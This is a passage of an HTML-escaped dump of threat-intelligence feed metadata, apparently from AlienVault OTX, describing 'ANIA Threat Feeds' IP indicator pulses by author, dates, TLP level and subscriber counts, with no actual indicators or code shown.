nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-10-05T23:02:54.501000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'197&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'IOCs&nbsp;-&nbsp;202096112&nbsp;-&nbsp;ANIA&nbsp;Threat&nbsp;Feeds&nbsp;-&nbsp;IP&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Segment&nbsp;0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;256,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_91912/resized/80/avatar_2b1b2b88b6.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'91912',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'AlessandroFiori'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-08-14T14:43:13.400000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'ANIA&nbsp;Collector&nbsp;-&nbsp;Advanced&nbsp;Network&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Interactive&nbsp;Analysis&nbsp;Collector&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Collected&nbsp;from&nbsp;Internet&nbsp;Storm&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Center&nbsp;IOCs&nbsp;List',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;5,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f36a30122779b1836f78656',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-09-13T14:03:55.266000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'220&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'IOCs&nbsp;-&nbsp;20208141635&nbsp;-&nbsp;ANIA&nbsp;Threat&nbsp;Feeds&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'IP&nbsp;Segment&nbsp;0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;255,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb